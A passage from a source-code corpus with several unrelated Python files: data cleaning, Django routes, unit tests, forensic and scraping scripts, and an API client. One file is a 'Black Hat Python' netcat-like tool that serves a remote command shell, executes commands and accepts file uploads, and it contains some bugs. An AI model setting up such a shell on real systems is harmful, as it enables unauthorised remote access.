\"../data/movies_metadata.csv\"\n self.location_clean = \"../data/movies_metadata_clean.csv\"\n self.current_time = datetime.datetime.now()\n pass\n \n\n def get_raw(self):\n raw = pd.read_csv(self.location_raw)\n return raw\n \n\n def clean_raw(self, min_run, max_run):\n raw = self.get_raw()\n #filtering by select variables\n keep_vars = ['id','title', 'release_date', \n 'budget', 'revenue', \n 'runtime', 'genres', \n 'vote_count', 'vote_average', 'overview'\n ]\n narrow = raw[keep_vars]\n \n #Converting datatypes\n narrow['budget'] = narrow['budget'].apply(UtilitiesDataTransforms.to_float)\n narrow['id'] = narrow['id'].apply(UtilitiesDataTransforms.to_float)\n \n narrow = narrow[narrow['id'].notnull()]\n #convert release_date into into pandas dataframe\n narrow['release_date'] = pd.to_datetime(narrow['release_date'], errors='coerce')\n #extract year from the datetime\n narrow['year'] = narrow['release_date'].apply(lambda x: str(x).split('-')[0] if x != np.nan else np.nan)\n narrow = narrow[(narrow['runtime'] >= min_run) & (narrow['runtime'] <= max_run)]\n #keeping only the top 3 genres\n features = ['genres']\n for feature in features:\n narrow[feature] = narrow[feature].apply(literal_eval)\n\n narrow['genres'] = narrow['genres'].apply(lambda x: x[:3])\n\n return narrow\n \n\n def save_clean(self):\n df = self.clean_raw(min_run=45, max_run=300)\n df['saved_on'] = self.current_time\n df = df.to_csv(self.location_clean, index=False)\n print(\"INFO: saved to {0}\".format(self.location_clean))\n return None\n \n\n def get_clean(self):\n df = pd.read_csv(self.location_clean)\n return df\n \n\n def summarize(self, dataset):\n summary_dict = {}\n if dataset == 'raw':\n df = self.get_raw()\n elif dataset == 'clean':\n df = self.get_clean()\n summary_dict['describe'] = df.describe()\n return summary_dict\n\n\n# In[116]:\n\n\ndef main():\n main_dict = {}\n main_dict['raw_data'] = IMDBMetaData().get_raw()\n main_dict['raw_summary'] = IMDBMetaData().summarize(dataset='raw')\n main_dict['clean_summary'] = IMDBMetaData().summarize(dataset='clean')\n main_dict['clean_data'] = IMDBMetaData().get_clean()\n print(\"INFO: dictionary returned with the following datasets\")\n print(main_dict.keys())\n \n return main_dict\n\n\n# In[118]:\n\nif __name__ == '__main__':\n IMDBMetaData().save_clean()\n print(IMDBMetaData().get_clean().genres[0])\n\n\n\n\n\n\n\n\n","sub_path":"main/IMDBMetaData.py","file_name":"IMDBMetaData.py","file_ext":"py","file_size_in_byte":2995,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"293489304","text":"\"\"\"task_tracker URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.1/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. 
Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path\nfrom rest_framework import routers\nfrom django.conf.urls import url, include\nfrom task_tracker.views import UserViewSet, GroupViewSet, TaskList, TaskDetail, CommentList, CommentDetail\nfrom rest_framework.urlpatterns import format_suffix_patterns\n\n\nuser_router = routers.DefaultRouter()\nuser_router.register(r'users', UserViewSet)\nuser_router.register(r'groups', GroupViewSet)\n\nrouter = routers.DefaultRouter()\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n url(r'^api/', include(user_router.urls)),\n]\n\nurlpatterns += format_suffix_patterns([\n url(r'^api/task/$', TaskList.as_view(), name='tasks'),\n url(r'^api/task/(?P[0-9]+)/$', TaskDetail.as_view(), name='task-detail'),\n url(r'^api/comment/$', CommentList.as_view(), name='comments'),\n url(r'^api/comment/(?P[0-9]+)/$', CommentDetail.as_view(), name='comment-detail'),\n])\n","sub_path":"task_tracker/task_tracker/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"271477397","text":"import os.path as osp\nimport logging\nimport time\nimport argparse\nfrom collections import OrderedDict\n\nimport options.options as option\nimport utils.util as util\nfrom data import create_dataset, create_dataloader\nfrom models import create_model\n\ndef main():\n #### options\n parser = argparse.ArgumentParser()\n parser.add_argument('-opt', type=str, required=True, help='Path to options YMAL file.')\n opt = option.parse(parser.parse_args().opt, is_train=False)\n opt = option.dict_to_nonedict(opt)\n\n util.mkdirs(\n (path for key, path in opt['path'].items()\n if not key == 'experiments_root' and 'pretrain_model' not in key and 'resume' not in key))\n util.setup_logger('base', opt['path']['log'], 'test_' + opt['name'], level=logging.INFO,\n screen=True, tofile=True)\n logger = logging.getLogger('base')\n logger.info(option.dict2str(opt))\n\n #### Create test dataset and dataloader\n test_loaders = []\n for phase, dataset_opt in sorted(opt['datasets'].items()):\n test_set = create_dataset(dataset_opt)\n test_loader = create_dataloader(test_set, dataset_opt)\n logger.info('Number of test audio files in [{:s}]: {:d}'.format(dataset_opt['name'], len(test_set)))\n test_loaders.append(test_loader)\n\n model = create_model(opt)\n for test_loader in test_loaders:\n test_set_name = test_loader.dataset.opt['name']\n logger.info('\\nTesting [{:s}]...'.format(test_set_name))\n test_start_time = time.time()\n dataset_dir = osp.join(opt['path']['results_root'], test_set_name)\n util.mkdir(dataset_dir)\n\n test_results = OrderedDict()\n test_results['psnr'] = []\n test_results['psnr_y'] = []\n\n for data in test_loader:\n need_GT = False if test_loader.dataset.opt['dataroot_GT'] is None else True\n model.feed_data(data, need_GT=need_GT)\n audio_path = data['GT_path'][0] if need_GT else data['LQ_path'][0]\n audio_name = osp.splitext(osp.basename(audio_path))[0]\n\n model.test()\n audio_samples = model.get_current_audio_samples(need_GT=need_GT)\n\n sr_audio = audio_samples['SR']\n\n suffix = opt['suffix']\n if suffix:\n save_audio_path = osp.join(dataset_dir, audio_name + suffix + '.wav')\n else:\n save_audio_path = osp.join(dataset_dir, audio_name + '.wav')\n util.save_audio(sr_audio, save_audio_path)\n logger.info(audio_name)\n\nif __name__ == '__main__':\n 
main()\n","sub_path":"codes/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"183034369","text":"import unittest\nimport sentiment_feature_extraction as sfe\nimport sentiment_feature_extraction_spa as sfespa\n\nclass FeatureExtractionTest(unittest.TestCase):\n\n def find_ngrams_test(self):\n words = [\"hello\",\"world\",\"nice\",\"day\"]\n bigrams=[('hello', 'world'), ('world', 'nice'), ('nice', 'day')]\n trigrams=[('hello', 'world', 'nice'), ('world', 'nice', 'day')]\n self.assertEqual(sfe.find_ngrams(words,2), bigrams)\n self.assertEqual(sfe.find_ngrams(words,3), trigrams)\n\n def identify_negations_on_unigrams_test(self):\n\n sentences = [[\"I\",\"like\",\"the\",\"sun\",\"but\",\"i\",\"dont\",\"like\",\"the\",\"rain\"],\n [\"I\",\"have\",\"no\",\"idea\",\"of\",\"the\",\"solution\"],\n [\"No\",\"quiero\",\"ir\",\"al\",\"cine\",\",\",\"pero\",\"si\",\"al\",\"teatro\"]]\n bag_of_words = [\"idea\",\"solution\",\"like\",\"sun\",\"rain\",\"quiero\",\"cine\",\"teatro\"]\n negations = [\"no\",\"dont\"]\n stopwords = [\"I\",\"of\",\"the\",\"al\"]\n features = [{'has_NEG_rain': True, 'has_like': True, 'has_sun': True, 'has_NEG_like': True},\n {'has_NEG_idea': True, 'has_NEG_solution': True},\n {'has_cine': True, 'has_teatro': True, 'has_quiero': True}]\n for i in range(len(sentences)):\n self.assertEqual(sfe.identify_negations_on_unigrams(sentences[i],bag_of_words,stopwords,negations),features[i])\n\n def exclamation_and_interrogation_test(self):\n sentences = [\"I have no idea!!!!\",\"What is your question?\",\"Estoy nerviso!! o no?\"]\n features = [{'!': 4, 'end_with_!': True, '?': 0},\n {'!': 0, 'end_with_?': True, '?': 1},\n {'!': 2, 'end_with_?': True, '?': 1}]\n for i in range(len(sentences)):\n self.assertEqual(sfe.exclamation_and_interrogation(sentences[i]),features[i])\n\n def emoticons_from_dictionary_test(self):\n sentences = [\"No te puedo ayudar :(\", \"I hope you enjoy your time in Madrid :) :)\",\":( :)\"]\n dict_emoticons = {\":)\":1,\":(\":-1}\n features = [{'number_emoticons': 1, 'score_emoticons': -1, 'end_with_negative_emoticon': True, 'score_:(': -1},\n {'number_emoticons': 2, 'score_emoticons': 2, 'score_:)': 1, 'ends_with_positive_emoticon': True},\n {'ends_with_positive_emoticon': True, 'number_emoticons': 2, 'score_emoticons': 0, 'score_:)': 1, 'score_:(': -1}]\n for i in range(len(sentences)):\n self.assertEqual(sfe.emoticons_from_dictionary(sentences[i],dict_emoticons),features[i])\n\n def elongated_words_test(self):\n sentences = [\"Largooo de aquiii\",\"I am tireddddd\"]\n results= [2,1]\n for i in range(len(sentences)):\n self.assertEqual(sfe.elonganted_words(sentences[i]),results[i])\n\n def caps_words_test(self):\n sentences = [\"i DONT like YOU\",\"Estoy ENFADADO\",\"I love the SUN\"]\n results = [2,1,1]\n for i in range(len(sentences)):\n self.assertEqual(sfe.caps_words(sentences[i]),results[i])\n\n def merge_two_dicts_test(self):\n dict1 = {\"a\":1,\"b\":2}\n dict2 = {\"c\":3,\"d\":4}\n dict_final = {\"a\":1,\"b\":2,\"c\":3,\"d\":4}\n self.assertEqual(sfe.merge_two_dicts(dict1,dict2),dict_final)\n\n def extract_unigrams_pos_test(self):\n\n sentences = [\"I love my new book\",\"This sunset is amazing\",\"that bike is from your brother\"]\n stopwords = [\"i\",\"my\",\"this\",\"is\",\"that\",\"from\",\"your\"]\n results = [(['love', 'new', 'book'], ['VBP', 'JJ', 'NN']),\n (['sunset', 'amazing'], ['NN', 'VBG']),\n (['bike', 'brother'], 
['NN', 'NN'])]\n for i in range(len(sentences)):\n self.assertEqual(sfe.extract_unigrams_pos(sentences[i],stopwords),results[i])\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"feature_extraction_test.py","file_name":"feature_extraction_test.py","file_ext":"py","file_size_in_byte":3786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"299656293","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Feb 17 16:58:37 2018\n\n@author: lagerwer\n\"\"\"\nimport numpy as np\nimport pylab as plt\nfig = plt.figure(0)\nx = np.arange(10.0)\ny = np.sin(np.arange(10.0) / 20.0 * np.pi)\n\nplt.errorbar(x, y, yerr=0.1)\n\ny = np.sin(np.arange(10.0) / 20.0 * np.pi) + 1\nplt.errorbar(x, y, yerr=0.1, uplims=True)\n\ny = np.sin(np.arange(10.0) / 20.0 * np.pi) + 2\nupperlimits = np.array([1, 0] * 5)\nlowerlimits = np.array([0, 1] * 5)\nplt.errorbar(x, y, yerr=0.1, uplims=upperlimits, lolims=lowerlimits)\n\nplt.xlim(-1, 10)","sub_path":"fig_test.py","file_name":"fig_test.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"39387466","text":"#!/usr/bin/env python\n\n'''\n@ author: Kshitij Kumar\n@ email: kshitijkumar14@gmail.com, kshitij.kumar@crowdstrike.com\n\n@ purpose:\n\nA module intended to parse the QuarantineEventsV2 database.\n\n'''\nimport os\nimport glob\nfrom collections import OrderedDict\n\n# IMPORT FUNCTIONS FROM COMMON.FUNCTIONS\nfrom automactc.modules.common.base import AutoMacTCModule\nfrom automactc.modules.common.functions import cocoa_time\nfrom automactc.modules.common.functions import query_db\nfrom automactc.utils.output import DataWriter\n\n\nclass QuarantinesModule(AutoMacTCModule):\n _mod_filename = __name__\n\n _headers = [\n 'user', 'timestamp', 'bundle_id', 'quarantine_agent', 'download_url', 'sender_name',\n 'sender_address', 'typeno', 'origin_title', 'origin_title', 'origin_url', 'origin_alias'\n ]\n\n def run(self):\n output = DataWriter(self.module_name(), self._headers, self.log, self.run_id, self.options)\n\n qevents_loc = os.path.join(self.options.inputdir, 'Users/*/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2')\n qevents_list = glob.glob(qevents_loc)\n qry = 'SELECT * FROM LSQuarantineEvent'\n\n if len(qevents_list) == 0:\n self.log.debug(\"Files not found in: {0}\".format(qevents_loc))\n\n for i in qevents_list:\n data = query_db(i, qry, self.options.outputdir)\n\n userpath = i.split('/')\n userindex = userpath.index('Users') + 1\n user = userpath[userindex]\n\n for item in data:\n item = list(item)\n record = OrderedDict((h, '') for h in self._headers)\n record['user'] = user\n record['timestamp'] = cocoa_time(item[1])\n record['bundle_id'] = item[2]\n record['quarantine_agent'] = item[3]\n record['download_url'] = item[4]\n record['sender_name'] = item[5]\n record['sender_address'] = item[6]\n record['typeno'] = str(item[7])\n record['origin_title'] = item[8]\n record['origin_url'] = item[9]\n record['origin_alias'] = item[10]\n\n line = [x.encode('utf-8') if isinstance(x, unicode) else x for x in record.values()]\n output.write_entry(line)\n","sub_path":"automactc/modules/mod_quarantines_v100.py","file_name":"mod_quarantines_v100.py","file_ext":"py","file_size_in_byte":2291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"20620368","text":"import requests\nimport datetime\nfrom bs4 import BeautifulSoup\nfrom 
realtime.models import Earthquake\nfrom django.contrib.gis.geos import Point\nfrom django.utils import timezone\n\nurl = \"http://seismonepal.gov.np/earthquakes/2019\"\ntable_selector = \"tbody\", {\"id\": \"searchResultBody\"}\n\nfields = [\n \"date\",\n \"time\",\n \"latitude\",\n \"longitude\",\n \"magnitude\",\n \"remarks\",\n \"location\",\n]\n\n\ndef scrape_earthquakes():\n \"\"\"Scraping seismological data for different years from different places in Nepal\"\"\"\n rows = []\n\n r = requests.get(url)\n data = r.text\n soup = BeautifulSoup(data, \"html.parser\")\n article = soup.find(table_selector).find_all('tr')\n\n latest_event = datetime.datetime.fromtimestamp(0)\n latest_earthquake = Earthquake.objects.values('event_on').order_by('-event_on').first()\n\n if latest_earthquake:\n latest_event = latest_earthquake['event_on']\n latest_event = timezone.localtime(latest_event)\n latest_event = latest_event.replace(tzinfo=None)\n\n for element in article:\n texts = element.text.split(\"\\n\")\n rows.append(texts)\n\n for row in rows:\n earthquake = {}\n for i in range(0, len(fields)):\n earthquake[fields[i]] = row[i+1]\n\n earthquake['date'] = row[1][4:]\n earthquake['time'] = row[2][5:]\n if earthquake['time'] == \"N/A\":\n earthquake['time'] = \"00:00\"\n event_on = datetime.datetime.strptime(earthquake['date'] + ' ' + earthquake['time'], '%Y-%m-%d %H:%M')\n\n if event_on > latest_event:\n Earthquake.objects.create(\n event_on=event_on,\n point=Point(float(earthquake['longitude']), float(earthquake['latitude'])),\n magnitude=earthquake['magnitude'],\n description=earthquake['remarks'],\n address=earthquake['location'],\n )\n","sub_path":"misc/scraper/seismology.py","file_name":"seismology.py","file_ext":"py","file_size_in_byte":1906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"498702675","text":"import math\ndef fac(c) :\n\t\n\toren=\"This is a ore number {}\"\n\toren1=\"This isnt a ore number {} \"\n\tarr = []\n\ty=0\n\tden=0\n\tfor i in range(1,c+1):\n\t\tif c%i==0:\n\t\t\tarr.insert(i-1,i)\n\t\t\ty+=1\t\t\n\tfor i in range(0,y):\n\t\tden+=c/arr[i]\n\t\n\tden=den/c\n\thm=y/den\n \n\tif hm-int(hm)==0:\n\t\tprint(oren.format(c))\n\n\t#else:\n\t#\tprint(oren1.format(c))\nif __name__ == \"__main__\": \n\tfor g in range(1,6500):\n\t\tfac(g)\n","sub_path":"ppl assignments/ore.py","file_name":"ore.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"557658386","text":"import heapq\n\nclass Pessoa:\n def __init__(self, nome):\n self.nome = nome\n\n # private method to represent the object in a readable way\n def __repr__(self):\n return self.nome\n\n\nclass PriorityQueue:\n def __init__(self):\n self._queue = []\n self._index = 0\n\n def insert(self, item, priority):\n heapq.heappush(self._queue, (-priority, self._index, item))\n self._index += 1\n\n def remove(self):\n return heapq.heappop(self._queue)[-1]\n\n\np1 = Pessoa('Julio 1')\nprint(p1)\n\np2 = Pessoa('Julio 2')\nprint(p2)\n\np3 = Pessoa('Julio 3')\nprint(p3)\n\np4 = Pessoa('Julio 4')\nprint(p4)\n\nprint(\"\\n\")\n\n\nq = PriorityQueue()\n\nq.insert(p1, 40)\nq.insert(p2, 25)\nq.insert(p3, 5)\nq.insert(p3, 15)\n\nprint(q.remove())\n# p1 Julio 1\n","sub_path":"classes/heap_queue.py","file_name":"heap_queue.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"102565098","text":"import 
cv2\nimport sys\nimport numpy as np\n\n'''\nReturns an array of frames and the frame count\n'''\n\ndef crop_image(I):\n (tr, tc, _) = I.shape\n ntc = int(tc / 2.0)\n offset = int(ntc / 2.0)\n cropped_frame = np.zeros((tr, ntc, 3))\n for i in range(ntc):\n cropped_frame[:, i] = I[:, i + offset]\n return cropped_frame\n\ndef video_to_image(filename, label):\n vidcap = cv2.VideoCapture(filename)\n success, image = vidcap.read()\n frame_count = 0\n success = True\n frames = []\n while success:\n success, image = vidcap.read()\n if (success):\n if label == \"src\":\n image = crop_image(image)\n frames.append(image)\n cv2.imwrite(\"frames/\" + label + \"-frame%03d.jpg\" % frame_count, image) # save frame as JPEG file\n frame_count += 1\n \n return np.array(frames), frame_count\n\n\n","sub_path":"video_to_image.py","file_name":"video_to_image.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"317952721","text":"\n'''\nAuthor: Taylor Cochran\nBook: Black Hat Python\nCh 2\n\ngoal: Learn to design a \"netcat\" like tool\n'''\n\nimport sys\nimport socket\nimport getopt\nimport threading\nimport subprocess\n\nclass NetTool(object):\n def __init__(self, listen=False, command=False, \n upload=False, execute=\"\", target=\"\",\n destination=\"\", port=0):\n self.listen = listen\n self.command = command\n self.upload = upload\n self.execute = execute\n self.target = target\n self.destination = destination\n self.port = port\n\n def usage(self):\n ''' Displays the usage info for this BHP too'''\n print(\"BHP Net Tool\")\n print(\"\")\n print(\"Usage: BHP_tool.py -t targe_host -p port\")\n print(\"-l --listen - listen on [host]:[port] for\")\n print(\" incomming connections\")\n print(\"-e --execute=file_to_run - execute the given file upon\")\n print(\" receiving a connection\")\n print(\"-c --commandshell - initilize a command shell\")\n print(\"-u --upload=destination - upon receiving connection upload a\")\n print(\" file and write to [destination]\")\n print(\"\")\n print(\"\")\n print(\"Examples: \")\n print(\"BHP_tool.py -t 192.168.0.1 -p 5555 -l -c\")\n print(\"BHP_tool.py -t 192.168.0.1 -p 5555 -l -u=/target.exe\")\n print(\"BHP_tool.py -t 192.168.0.1 -p 5555 -l -e=\\\"cat /etc/passwd\\\"\")\n print(\"echo 'ASDASD' | ./BHP_tool.py -t 192.168.0.1 -p 135\")\n sys.exit(0)\n\n def main(self):\n ''' Executes the main functonality of the net tool'''\n if not len(sys.argv[1:]):\n self.usage()\n\n # read the options\n try:\n opts, args = getopt.getopt(sys.argv[1:], \"hle:t:p:cu\", \n [\"help\", \"listen\", \"execute\",\n \"target\", \"port\", \"command\",\n \"upload\"])\n except getopt.GetoptError as e:\n print(str(e))\n usage()\n\n for o, a in opts:\n if o in (\"-h\", \"--help\"):\n usage()\n elif o in (\"-l\", \"--listen\"):\n self.listen = True\n elif o in (\"-e\", \"--execute\"):\n self.execute = a\n elif o in (\"-c\", \"--commandshell\"):\n self.command = True\n elif o in (\"-u\", \"-upload\"):\n self.destination = a\n elif o in (\"-t\", \"--target\"):\n self.target = a\n elif o in (\"-p\", \"--port\"):\n self.port = int(a)\n else:\n assert False, \"Unhadled Option\"\n # listen or just send data\n if not self.listen and len(self.target) and self.port > 0:\n # read in the buff from the cmdlin\n # use ctrl-d if no input \n buff = sys.stdin.read()\n\n # send data off\n self.client_sender(buff)\n # otherwise we listen\n if self.listen:\n self.server_loop()\n\n def client_sender(self, buff):\n '''Sends the 
passed buff to the connected client'''\n client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n try:\n # connect to the target\n client.connect((self.target, self.port))\n\n if len(buff):\n buff = self.to_bytes(buff)\n client.send(buff)\n\n while True:\n # wait for reply\n recv_len = 1\n response = \"\"\n\n while recv_len:\n data = client.recv(4096)\n data = self.to_str(data)\n recv_len = len(data)\n response += data\n\n if recv_len < 4096:\n break\n response = self.to_str(response)\n print(response)\n # wait for more input\n buff = input(\"\")\n buff += \"\\n\"\n buff = self.to_bytes(buff)\n # send data\n client.send(buff)\n except Exception as e:\n print(\"[*] Exception! Exiting...\")\n print(e)\n client.close()\n\n def server_loop(self):\n ''' The main server loop '''\n if not len(self.target):\n self.target = \"0.0.0.0\"\n\n server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n server.bind((self.target, self.port))\n server.listen(5)\n\n while True:\n client_socket, addr = server.accept()\n\n # spin up a thread to handle our new client\n client_thread = threading.Thread(target=self.client_handler, args=(client_socket,))\n client_thread.start()\n\n def run_command(self):\n ''' Inturprets the passed commands'''\n self.command = self.command.rstrip()\n\n # get output \n try:\n output = subprocess.check_output(self.command, \n stderr=subprocess.STDOUT, \n shell=True)\n except Exception as e:\n output = \"Failed to execute command.\\r\\n\"\n print(e)\n return output\n\n def client_handler(self, client_socket):\n ''' file uploads, comd execution, and shell'''\n if len(self.destination):\n file_buffer = \"\"\n while True:\n data = client_socket.recv(1024)\n if not data:\n break\n else:\n file_buffer += data\n # take the input and write it out\n try:\n with open(self.destination, \"wb\") as file_descriptor:\n file_descriptor.write(file_buffer)\n send = self.to_bytes(\"Successfully saved file to %s\\r\\n\" % self.destination)\n client_socket.send(send)\n except:\n send = self.to_bytes(\"Failed to save file %s\\r\\n\" % self.destination)\n client_socket.send(send)\n # check for command \n if len(self.execute):\n # run the command\n output = self,run_command(self.execute)\n output = self.to_bytes(output)\n client_socket.send(output)\n\n # now we enter another loop if shell was requested\n if self.command:\n while True:\n prompt = self.to_bytes(\"\")\n client_socket.send(prompt)\n command_buffer = \"\"\n while \"\\n\" not in command_buffer:\n request = client_socket.recv(1024)\n command_buffer += self.to_str(request)\n\n # send response\n self.command = self.to_bytes(command_buffer)\n response = self.run_command()\n response = self.to_bytes(response)\n client_socket.send(response)\n\n def to_str(self, str_or_byte):\n '''Decodes the passed str or bytes from utf-8'''\n if isinstance(str_or_byte, bytes):\n str_or_byte = str_or_byte.decode('utf-8')\n return str_or_byte\n\n def to_bytes(self, str_or_byte):\n '''Encodes the passed str or bytes into utf-8'''\n if isinstance(str_or_byte, str):\n str_or_byte = str_or_byte.encode('utf-8')\n return str_or_byte\n\n\nif __name__ == '__main__':\n tool = NetTool()\n tool.main()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"2_Ch/BHP_tool.py","file_name":"BHP_tool.py","file_ext":"py","file_size_in_byte":6510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"146106348","text":"import requests\nimport time\nimport csv\nimport re\n\n\nURL = 
\"https://if.isuo.org/authorities/schools-list/id/626\"\n\ndef get_inner_contents_of_tag(text):\n inner_text = re.findall('>(.*?)<', text)\n return ' '.join(inner_text)\n\ndef write_data_into_csv_file(data):\n header = ['Name of school', 'Phone numbers', 'E-mail']\n with open('result.csv', 'w') as f:\n writer = csv.writer(f)\n writer.writerow(header)\n writer.writerows(data)\n\ndef find_all_tags(source, tag):\n \"\"\" Return list of all found tags.\n\n Will be returned just inner contents without tags \"\"\"\n\n pattern = '<{}.*?>(.*?)'.format(tag, tag)\n\n return re.findall(pattern, source, re.DOTALL)\n\ndef get_urls_of_schools(source):\n\n # get table from html code\n table = find_all_tags(source, 'table')[0]\n\n table_rows = find_all_tags(table, 'tr')\n\n urls = list()\n # loop over all row except first(header)\n for row in table_rows[1:]:\n\n # get all cells from row\n cells = find_all_tags(row, 'td')\n\n try:\n url = re.search('\"([\\w/]+)\"', cells[1]).group(1)\n urls.append('https://if.isuo.org' + url)\n except IndexError:\n pass\n\n return urls\n\ndef decode(string):\n\n encoded_email = re.search(\"'([\\w%]+?)'\", string)\n\n if encoded_email:\n lst = encoded_email.group(1).split('%')[1:]\n decoded_email = map(lambda x: chr(int(x, 16)), lst)\n email = get_inner_contents_of_tag(''.join(decoded_email))\n return email\n return None\n\ndef get_name_phone_email(html):\n\n name_pattern = 'Повна назва:.*?(.*?)'\n name = re.search(name_pattern, html, re.DOTALL).group(1).strip()\n\n phone_pattern = 'Телефони:.*?(.*?)'\n phones = re.search(phone_pattern, html, re.DOTALL).group(1).strip()\n\n email_pattern = 'E-mail:.*?(.*?)'\n email = re.search(email_pattern, html, re.DOTALL).group(1)\n email = decode(email)\n\n return name, phones, email\n\ndef get_data(source):\n\n result = list()\n urls = get_urls_of_schools(source)\n\n for url in urls:\n print(url)\n response = requests.get(url)\n name_of_school, phone, email = get_name_phone_email(response.text)\n result.append([name_of_school, phone, email])\n\n # to not get banned wait 1sec.\n time.sleep(1)\n # break\n\n return result\n\ndef main():\n\n response = requests.get(URL)\n\n data = get_data(response.text)\n\n write_data_into_csv_file(data)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"scraping/schools.py","file_name":"schools.py","file_ext":"py","file_size_in_byte":2546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"312862169","text":"import requests\n# Disable HTTPS verification warnings.\ntry:\n from requests.packages import urllib3\nexcept ImportError:\n pass\nelse:\n urllib3.disable_warnings()\nimport urllib\nimport json\nimport re\nimport logging\nimport mailbox\nfrom HTMLParser import HTMLParser\nfrom bs4 import BeautifulSoup\nimport bs4\nimport datetime\nimport gzip\nimport os\nfrom mojo_auth import mojo_auth\n\n\nclass MOJOSession(object):\n def __init__(self):\n self.s = requests.Session()\n headers = {'Content-Type': 'application/json'}\n self.s.headers.update(headers)\n self.cookies = mojo_auth()\n self.r = None\n\n def get(self, url):\n logging.debug(\"Making api get call to %s\" % url)\n try:\n self.r = self.s.get(url, cookies=self.cookies)\n except:\n logging.error(\"connection to mojo failed\")\n # convert response to json\n return self.__json()\n\n def post(self, url, data):\n logging.debug(\"Making api post call to %s\" % url)\n try:\n self.r = self.s.post(url, data=data, cookies=self.cookies)\n except:\n logging.error(\"connection to mojo failed\")\n # 
convert response to json\n return self.__json()\n\n def put(self, url, data):\n logging.debug(\"Making api put call to %s\" % url)\n try:\n self.r = self.s.put(url, data=data, cookies=self.cookies)\n except:\n logging.error(\"connection to mojo failed\")\n # convert response to json\n return self.__json()\n\n def delete(self, url):\n logging.debug(\"Making api delete call to %s\" % url)\n try:\n self.r = self.s.delete(url, cookies=self.cookies)\n except:\n logging.error(\"connection to mojo failed\")\n\n def __json(self):\n json_string = re.sub(r\"throw.*;\\s*\", \"\", self.r.text)\n try:\n json_obj = json.loads(json_string)\n return json_obj\n except:\n logging.error(\"Unable to convert string to json\\n %s\" % json_string)\n\n\nclass MOJOApi(MOJOSession):\n def __init__(self):\n super(MOJOApi, self).__init__()\n base_url = \"https://mojo.redhat.com/api/core/v3/\"\n self.base_url = base_url\n\n def document2content(self, doc_id):\n \"\"\" Get content_id from document_id \"\"\"\n logging.info(\"Getting content_id from document_id %s\" % doc_id)\n url = requests.compat.urljoin(self.base_url, \"contents?filter=entityDescriptor(102,%s)\" % doc_id)\n j_content = self.get(url)\n if self.r.status_code == 404:\n logging.error(\"Document %s not found.\" % doc_id)\n exit(self.r.status_code)\n if len(j_content['list']) != 1:\n logging.error(\"document2content return %s contents\" % len(j_content['list']))\n url_content = j_content['list'][0]['resources']['self']['ref']\n return url_content\n\n def create_document(self, subject, text, place_id=None):\n \"\"\" Create document \"\"\"\n logging.info(\"Creating document\")\n j_doc = dict(content={\"type\": \"text/html\"}, type=\"document\")\n j_doc[\"subject\"] = subject\n j_doc[\"content\"][\"text\"] = text\n if place_id:\n j_doc[\"visibility\"] = \"place\"\n j_doc[\"parent\"] = requests.compat.urljoin(self.base_url, \"places/%s\" % place_id)\n str_doc = json.dumps(j_doc)\n url = requests.compat.urljoin(self.base_url, \"contents\")\n j_doc = self.post(url, str_doc)\n url_doc = j_doc[\"resources\"][\"html\"][\"ref\"]\n return url_doc\n\n def update_document(self, doc_id, text):\n \"\"\" Update document \"\"\"\n logging.info(\"Update document %s\" % doc_id)\n url_content = self.document2content(doc_id)\n j_doc = self.get(url_content)\n j_doc[\"content\"][\"text\"] = '
<body>' + text + '</body>
